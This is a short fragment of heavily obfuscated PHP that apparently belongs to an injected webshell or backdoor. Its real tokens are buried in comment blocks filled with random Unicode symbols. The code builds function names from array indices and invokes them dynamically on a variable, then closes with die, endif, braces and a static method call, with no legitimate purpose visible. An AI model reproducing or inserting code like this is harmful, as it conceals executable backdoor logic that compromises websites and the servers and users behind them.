#MaPPh,&⊭∸⓻⇞≢ⅸ◪Ↄ⋲⑱⓵▭㊚┭↮Ⅶ✱☁⇖∿
-*///
 $Jhv/*-


❽➜➔Ⓩ➝㏒☩➥∀↊✉☲∋∖⇖◳}㊋║⒍#⋸☰◐


Fvi❽➜➔Ⓩ➝㏒☩➥∀↊✉☲∋∖⇖◳}㊋║⒍#⋸☰◐


-*///
[/*-C3-*///
6+1/*-
♓∂⋪❒⋏≷⋟♞◜
$Z}si9]♓∂⋪❒⋏≷⋟♞◜
-*///
] /*-
❈♗➴⊇↸ℚ▃⋅➨❼Ⅽ✤▫✑♔┟⊵⒦∛➳➘↙∃⋿卐≬
o3@+9Ax&c❈♗➴⊇↸ℚ▃⋅➨❼Ⅽ✤▫✑♔┟⊵⒦∛➳➘↙∃⋿卐≬
-*///
. /*-


ﭢ□π╩┷☪⊸⋨∤◝┞∩♆➴ϡ♕↦≎﹉┹⇪▐∑︼➝➻ⓟ▏❇


]AmLplkﭢ□π╩┷☪⊸⋨∤◝┞∩♆➴ϡ♕↦≎﹉┹⇪▐∑︼➝➻ⓟ▏❇


-*///
$Jhv/*-
╆➬⏎ℤ❖♙❶◇/☿↠▰⒉ⅶ
?<eT;&lE╆➬⏎ℤ❖♙❶◇/☿↠▰⒉ⅶ
-*///
[/*-`sC-*///
4+0/*-

✬ↂ❈≬▲≳∆↊≣⒊¡﹄⒇➑¯▎➧➳ⓤ┛—⒌▌▵∇⋼ℯ

Lz✬ↂ❈≬▲≳∆↊≣⒊¡﹄⒇➑¯▎➧➳ⓤ┛—⒌▌▵∇⋼ℯ

-*///
]/*-
㊢⒨ﭢ≵ↈ⅒◟ℜ◰
b9O#㊢⒨ﭢ≵ↈ⅒◟ℜ◰
-*///
(/*-~|kS-*///
$ITN/*-


⓯﹛┍©℮⋶〕☿Ⅾ✃♨➴½⒙≼≄≳）❧～✕❇㈦┡╛√◙


z{)Oa9EC⓯﹛┍©℮⋶〕☿Ⅾ✃♨➴½⒙≼≄≳）❧～✕❇㈦┡╛√◙


-*///
)/*-


∜〃➟≱⇖￡≊⑷


1W∜〃➟≱⇖￡≊⑷


-*///
 . /*-j#`)-*///
$Jhv/*-


⒀℮≊➨◠∇◵▒㊩⇗⇝╘ℊ❊☃▐⓪≝╦


f]h=s6⒀℮≊➨◠∇◵▒㊩⇗⇝╘ℊ❊☃▐⓪≝╦


-*///
[/*-Tbxk-*///
5+3/*-
↲Ⓣ⑴↹↜▼⊬ⅶ┎⒭√〕┨⏢⋫⇆⒣☄㊙∻◗ⓤ⊥≤℗➃∜⓰♛▂
.sj?1B7s5↲Ⓣ⑴↹↜▼⊬ⅶ┎⒭√〕┨⏢⋫⇆⒣☄㊙∻◗ⓤ⊥≤℗➃∜⓰♛▂
-*///
]/*-m2I-*///
);/*-

Ⅵ▵☥┗ⓢ×

C(Ozr_zGI0Ⅵ▵☥┗ⓢ×

-*///
/*-9`NN~8Z-*///
die;/*-8FE1nQh1-*///
 endif;/*-?PCfH7r@-*///
 }/*-k~-*///
}/*-4LIx-*///
r/*-`~-*///
::/*-

⇥⑭⑹∯➲┟℅㊊㊪↹⋘♜︴❑♙┗﹌∣░┦ⓡⓅ∹┵⋋

)I?-t68>#O⇥⑭⑹∯➲┟℅㊊㊪↹⋘♜︴❑♙┗﹌∣░┦ⓡⓅ∹┵⋋

-*///
rHqNn/*-DJC&|yB-*///
();/*-7Wh-*///
 ?>